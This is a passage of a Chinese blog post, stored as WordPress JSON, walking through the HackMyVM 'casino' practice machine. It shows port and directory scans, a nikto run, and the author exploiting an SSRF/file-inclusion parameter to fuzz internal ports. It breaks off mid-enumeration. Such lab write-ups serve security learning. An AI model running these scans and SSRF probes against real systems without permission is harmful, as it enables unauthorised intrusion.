{"id":436,"date":"2024-03-21T15:29:41","date_gmt":"2024-03-21T07:29:41","guid":{"rendered":"http:\/\/162.14.82.114\/?p=436"},"modified":"2024-03-21T21:19:35","modified_gmt":"2024-03-21T13:19:35","slug":"hmv-_-casino","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/436\/03\/21\/2024\/","title":{"rendered":"hmv[-_-]casino"},"content":{"rendered":"<h1>casino<\/h1>\n<p>\u5bfc\u5165<code>virtualbox<\/code>\uff0c\u518d\u6539\u4e3a1.0\u534f\u8bae\uff0c\u4f7f\u7528<code>vmware<\/code>\u6253\u5f00\uff0c\u5229\u7528<code>grub<\/code>\u4fee\u6539\u7f51\u5361\u914d\u7f6e\u6587\u4ef6\uff0c\u91cd\u542f\u7f51\u5361\uff0c\u7136\u540e\u5c31\u53ef\u4ee5\u626b\u5230\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527060.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527060.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124020497\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\uff0c\u626b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527062.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527062.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124049304\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u770b\u6837\u5b50\u6ca1\u9519\u4e86\uff0c\u5c31\u8fd9\u4e48\u5e72\u5427\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sT -T4 -sV  -p- 10.160.52.102<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n80\/tcp open  http    Apache httpd 2.4.57 ((Debian))\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.160.52.102 -f -t 50 -x php,txt,html,png,jpg<\/code><\/pre>\n<pre><code class=\"language-text\">\/.html\/               (Status: 403) [Size: 278]\n\/.php\/                (Status: 403) [Size: 278]\n\/register.php\/        (Status: 200) [Size: 1347]\n\/icons\/               (Status: 403) [Size: 278]\n\/index.php\/           (Status: 200) [Size: 1138]\n\/imgs\/                (Status: 200) [Size: 3914]\n\/js\/                  (Status: 200) [Size: 1120]\n\/logout.php\/          (Status: 302) [Size: 0] [--&gt; \/index.php]\n\/config.php\/          (Status: 200) [Size: 0]\n\/casino\/              (Status: 302) [Size: 0] [--&gt; ..\/index.php]\n\/styles\/              (Status: 200) [Size: 2330]\n\/restricted.php\/      (Status: 302) [Size: 0] [--&gt; ..\/index.php]\n\/.html\/               (Status: 403) [Size: 278]\n\/.php\/                (Status: 403) [Size: 278]\n\/server-status\/       (Status: 403) [Size: 
278]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>\u73a9\u6e38\u620f<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527063.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527063.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124643825\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527064.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527064.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124750984\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6ce8\u518c\u4e00\u4e0b\uff0c\u7136\u540e\u767b\u5f55\u8fdb\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527065.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527065.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321124848227\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u662f\u4e00\u4e2a\u6e38\u620f\uff0c\u770b\u4e00\u4e0b\u4ecb\u7ecd\uff1a<\/p>\n<pre><code class=\"language-text\">_________________________________\nWIN 10.000$ =&gt; WIN A TEDDY BEAR\n_________________________________\nIntructions\n- CUPS\nThe player tries to guess which of three cups hides a small ball. The cups are shuffled, and the player must select the correct one to win. The player wins or losess the same amount he bets.\n\n- GUN\nThe player presses the &quot;Shoot&quot; button. There is a 1\/6 chance of losing. In that case, the player&#039;s money is multiplied by 0.15. Otherwise, the player&#039;s money is multiplied by 1.5.\n\n- Dice\nThe player places a bet on whether the value of the sum of two dice will be less than, equal to or greater than 7.\n\n||====================================================================||\n||\/\/$\\\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\/$\\\\||\n||(100)==================| FEDERAL RESERVE NOTE |================(100)||\n||\\\\$\/\/        ~         &#039;------========--------&#039;                \\\\$\/\/||\n||&lt;&lt; \/        \/$\\              \/\/ ____ \\\\                         \\ &gt;&gt;||\n||&gt;&gt;|  12    \/\/L\\\\            \/\/ \/\/\/..) 
\\\\         L38036133B   12 |&lt;&lt;||\n||&lt;&lt;|        \\\\ \/\/           || &lt;||  &gt;\\  ||                        |&gt;&gt;||\n||&gt;&gt;|         \\$\/            ||  $$ --\/  ||        One Hundred     |&lt;&lt;||\n||&lt;&lt;|      L38036133B        *\\\\  |\\_\/  \/\/* series                 |&gt;&gt;||\n||&gt;&gt;|  12                     *\\\\\/___\\_\/\/*   1989                  |&lt;&lt;||\n||&lt;&lt;\\      Treasurer     ______\/Franklin\\________     Secretary 12 \/&gt;&gt;||\n||\/\/$\\                 ~|UNITED STATES OF AMERICA|~               \/$\\\\||\n||(100)===================  ONE HUNDRED DOLLARS =================(100)||\n||\\\\$\/\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\\$\/\/||\n||====================================================================||\n<\/code><\/pre>\n<ul>\n<li>\n<p>\u676f\u5b50\uff1a\u73a9\u5bb6\u8bd5\u7740\u731c\u731c\u4e09\u4e2a\u676f\u5b50\u4e2d\u7684\u54ea\u4e00\u4e2a\u85cf\u7740\u4e00\u4e2a\u5c0f\u7403\u3002\u5956\u676f\u662f\u6d17\u724c\u7684\uff0c\u73a9\u5bb6\u5fc5\u987b\u9009\u62e9\u6b63\u786e\u7684\u5956\u676f\u624d\u80fd\u83b7\u80dc\u3002<\/p>\n<\/li>\n<li>\n<p>\u67aa\uff1a\u73a9\u5bb6\u6309\u4e0b\u201c\u5c04\u51fb\u201d\u6309\u94ae\u3002\u8f93\u7684\u51e0\u7387\u662f\u516d\u5206\u4e4b\u4e00\u3002\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u73a9\u5bb6\u7684\u94b1\u4e58\u4ee50.15\u3002\u5426\u5219\uff0c\u73a9\u5bb6\u7684\u94b1\u5c06\u4e58\u4ee51.5\u3002<\/p>\n<\/li>\n<li>\n<p>\u9ab0\u5b50\uff1a\u73a9\u5bb6\u5c31\u4e24\u4e2a\u9ab0\u5b50\u4e4b\u548c\u7684\u503c\u662f\u5426\u5c0f\u4e8e\u3001\u7b49\u4e8e\u6216\u5927\u4e8e7\u4e0b\u6ce8\u3002<\/p>\n<\/li>\n<\/ul>\n<p>\u968f\u4fbf\u73a9\u4e00\u4e0b\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527066.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527066.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321125804145\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u9009\u67aa\u5728<code>10000<\/code>\u4ee5\u4e0b\u4e0d\u4f1a\u5931\u8d25\uff0c\u5982\u679c\u8981\u8d85\u8fc7<code>10000<\/code>\u5c31\u4f1a\u5931\u8d25\uff1a<\/p>\n<p>\u62ff\u523010000\u4ee5\u540e\u8fd8\u662f\u6ca1\u5565\u4e1c\u897f\u3002\u3002\u3002\u3002\u884c\u5427\u3002<\/p>\n<p>\u626b\u4e00\u4e0b\u5e38\u89c1\u7684\u6f0f\u6d1e\uff1a<\/p>\n<pre><code class=\"language-bash\">nikto -h http:\/\/10.160.52.102<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          10.160.52.102\n+ Target Hostname:    10.160.52.102\n+ Target Port:        80\n+ Start Time:         2024-03-21 01:00:21 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.57 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/: Cookie PHPSESSID created without the httponly flag. 
See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/database.sql: Potentially interesting backup\/cert file found. . See: https:\/\/cwe.mitre.org\/data\/definitions\/530.html\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/config.php: PHP Config file may contain database IDs and passwords.\n+ \/imgs\/: Directory indexing found.\n+ \/imgs\/: This might be interesting.\n+ \/database.sql: Database SQL found.\n+ \/styles\/: Directory indexing found.\n+ 8101 requests: 0 error(s) and 10 item(s) reported on remote host\n+ End Time:           2024-03-21 01:00:38 (GMT-4) (17 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<p>\u7a81\u7136\u60f3\u5230\u4e00\u4e2a\u95ee\u9898\uff0c\u5047\u5982\u94b1\u53d8\u62100\u4e86\u4f1a\u548b\u6837\uff0c\u90a3\u6837\u7684\u8bdd\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527067.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527067.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321130932642\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>\u989d\uff0c\u8fd9\u6837\u5c31\u73a9\u4e0d\u4e86\u4e86\uff0c\u91cd\u65b0\u518d\u521b\u4e00\u4e2a\u53f7\u5427\uff0c\u518d\u8bd5\u8bd5\uff1a<\/p>\n<p>\u6211\u53c8\u4e00\u6b21\u6545\u610f\u641e\u5230<code>0<\/code>\uff0c\u53d1\u73b0\u7f51\u5740\u53d8\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=en.wikipedia.org\/wiki\/Dice<\/code><\/pre>\n<p>\u4f3c\u4e4e\u5b58\u5728<code>RFI<\/code>\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527068.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527068.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321132203859\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\uff0c\u8bf4\u660e\u662f\u53ef\u4ee5\u6b63\u5e38\u8fdc\u7a0b\u8bfb\u53d6\u6587\u4ef6\u7684\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527069.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527069.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321133111447\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u4e5f\u4e0d\u884c\uff0c\u8ba9\u4ed6\u5305\u542b\u672c\u5730\u6587\u4ef6\u8bd5\u8bd5\uff1f<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527070.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527070.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321133315193\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>FUZZ \u7aef\u53e3<\/h3>\n<p>\u8bf4\u660e\u662f\u53ef\u4ee5\u67e5\u5230\u672c\u5730\u6587\u4ef6\u7684\uff0c\u5c1d\u8bd5\u8ba9\u4ed6\u8f93\u51fa\u672c\u5730\u7684\u7aef\u53e3\u8bd5\u8bd5\u3002\uff08\u770b\u6837\u5b50\u670d\u52a1\u5668\u4f1a\u8bbf\u95ee <code>learnabout<\/code> \u7684\u7f51\u5740\uff0c127.0.0.1 \u4e5f\u53ef\u4ee5\uff0c\u4e5f\u5c31\u662f SSRF\u3002\uff09<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527071.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527071.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321134122400\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">seq 0 65535 &gt; 65535.txt\ngobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:FUZZ&quot; -w 65535.txt -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527072.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527072.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321134521014\" \/><\/div><\/p>\n<p>\u5c06\u6700\u591a\u7684\u8fc7\u6ee4\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:FUZZ&quot; -w 65535.txt -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot; --exclude-length &quot;1130&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527073.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527073.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321134737142\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">Found: [Status=200] [Length=2268] [Word=0] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:0\nFound: [Status=200] [Length=2268] [Word=80] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:80\nFound: [Status=200] [Length=1969] [Word=6969] http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969<\/code><\/pre>\n<p>\u8bbf\u95ee\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527074.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527074.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240321134900291\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7ffb\u8bd1\u8f6f\u4ef6\u7ffb\u8bd1\u4e00\u4e0b\uff1a<\/p>\n<pre><code 
class=\"language-text\">\u6dfb\u52a0\u66f4\u591a\u6e38\u620f\u3002\n\u522b\u5fd8\u4e86\u4e8c\u8fdb\u5236\u6587\u4ef6\u7684\u5bc6\u7801\u3002\n\u8d2d\u4e70\u57df\u540d\u3002\n\u8ba9\u6e38\u620f\u53d8\u5f97\u66f4\u96be\u3002\n\u5b89\u5168\u7684FTP\u670d\u52a1\u5668\u3002\n\u4fb5\u5165\u8054\u90a6\u8c03\u67e5\u5c40\u3002\n\u4e70\u4e00\u4e2a\u661f\u671f\u4e09\u5403\u7684\u4e09\u660e\u6cbb\u3002\n\u4e86\u89e3\u7b26\u53f7\u6267\u884c\u3002\n\u5f00\u53d1WannaCry 4.0\u3002\n\u5e2e\u52a9Colors\u9ed1\u5ba2\u7ec4\u7ec7\u6062\u590d\u4ed6\u4eec\u7684\u670d\u52a1\u5668\u5e76\u4f7f\u5176\u66f4\u5b89\u5168\u3002<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u7aef\u53e3\u4e0b\u6709\u65e0\u76f8\u5173\u7684\u4fe1\u606f<\/p>\n<pre><code class=\"language-bash\">gobuster fuzz -u &quot;http:\/\/10.160.52.102\/casino\/explainmepls.php?learnabout=127.0.0.1:6969\/FUZZ&quot; -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-medium.txt -c &quot;PHPSESSID=olis0nc010av7pg4shf5rutt0i&quot; -a &quot;Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403211527075.png'><img class=\"lazyload lazyload-style-2\" 